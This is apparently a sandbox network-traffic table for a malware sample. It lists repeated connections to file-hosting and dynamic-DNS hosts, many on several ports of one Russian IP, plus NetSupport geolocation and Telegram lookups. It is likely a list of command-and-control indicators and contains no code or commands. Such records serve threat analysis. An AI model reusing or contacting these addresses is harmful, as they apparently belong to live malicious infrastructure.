| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 91.92.242.5:443 | tcp | |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp |
| GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| GB | 62.172.138.8:80 | geo.netsupportsoftware.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 5.242.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.138.172.62.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 8.8.8.8:53 | 63.85.215.91.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 13.43.107.13.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| DE | 178.162.202.48:443 | datalake.abuse.ch | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| US | 8.8.8.8:53 | 23.249.124.192.in-addr.arpa | udp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | 195.201.255.35 | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
